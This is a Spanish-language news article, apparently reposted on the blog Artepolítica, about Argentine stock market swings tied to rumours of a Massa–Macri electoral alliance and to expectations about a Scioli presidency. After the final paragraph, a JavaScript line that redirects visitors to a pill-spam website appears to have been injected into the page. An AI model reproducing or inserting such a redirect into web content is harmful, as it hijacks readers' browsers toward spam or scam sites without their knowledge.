El mercado espera que la oposición haga una alianza

El mercado local hizo en las últimas 48 horas sus propias «elecciones primarias» al experimentar anteayer una fuerte suba, que ayer se diluyó, de la mano de una eventual alianza entre el massismo y el macrismo en los comicios presidenciales de octubre próximo.
El Merval subió anteayer 6,7%, pero ayer cayó 2,5%, mientras que en los ADR se produjo una situación similar, con un alza del 10% seguida por una baja del 5 por ciento, respectivamente.
Calificadas fuentes de la city porteña indicaron a la nacion que fue muy fuerte la ola de compras que se generó en los últimos días ante la posibilidad de una coalición que, públicamente, los protagonistas hasta ahora se niegan a confirmar. Sin embargo, una fuente muy importante del mercado dijo: «Si hay inversores comprando o posicionándose es porque están al tanto de conversaciones entre los sectores más dialoguistas del macrismo, como Emilio Monzó, de Pro, y Joaquín de la Torre, del massismo, para llegar a un entendimiento y eso entusiasma mucho al mercado», más allá de las desmentidas oficiales.
Si bien hay fondos de Wall Street dispuestos a invertir en la Argentina gane quien gane, quienes siguen más cerca los acontecimientos del país se muestran escépticos por el acercamiento del gobernador Daniel Scioli al kirchnerismo y temen que él convalide ahora la inclusión de muchos funcionarios nacionales en su futuro gabinete y que, cuando gane, mantenga la actual política económica.
Por eso creen que Macri debe sumar a Massa como candidato a gobernador en la provincia de Buenos Aires y así «garantizaría su triunfo y la derrota segura de Cristina Kirchner en las elecciones».
«La situación del mercado no puede seguir así el año que viene y, por otro lado, está claro que Macri no está en condiciones de ganar solo, así que no se entiende su empeño en hacerle caso a [su consultor, Jaime] Durán Barba y no aliarse a Massa, que le puede aportar votos y, sobre todo, fiscales en la provincia. Y lo mismo ocurre cuando deja de lado una figura como Carlos Reutemann», expresó la fuente, algo enojada con el jefe de gobierno porteño.
Otro ejecutivo del sector financiero recibió una explicación de un funcionario importante de Pro sobre esta soledad: «Ellos creen que pueden imitar al Frente Amplio, que, tras haber gobernado en Montevideo, pudieron ganar luego en todo Uruguay, pero no se puede asimilar la situación uruguaya a la de la Argentina porque el peso de la ciudad de Buenos Aires sobre el total del padrón del país es muy inferior al de Montevideo sobre todo Uruguay», explicó.
Este ejecutivo cree que están dadas las condiciones para que gane Scioli y para que, en una primera etapa, haya una continuidad de una parte del gabinete kirchnerista.
Este ejecutivo sí cree que Scioli es capaz de una «ruptura» una vez que se consolide en el poder. «Siempre hizo lo que quiso. Y lo mismo hará si es presidente», opinó.
Para sostener su opinión, el ejecutivo aclaró que Scioli no está solo en el justicialismo, al recordar que la semana pasada el gobernador salteño, Juan Manuel Urtubey, declaró, en un almuerzo, ante la mesa ejecutiva de Adeba: «Los gobernadores peronistas vamos a salir a bancar a Scioli si en el kirchnerismo lo quieren desplazar antes de las PASO».
Además, el mandatario salteño expresó que cree que «en un año Cristina se va a su casa, no hay por qué preocuparse», y advirtió que, por lo menos en Salta, «las encuestas marcan «un empate entre Scioli y Macri», de cara a los comicios presidenciales de octubre próximo..

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *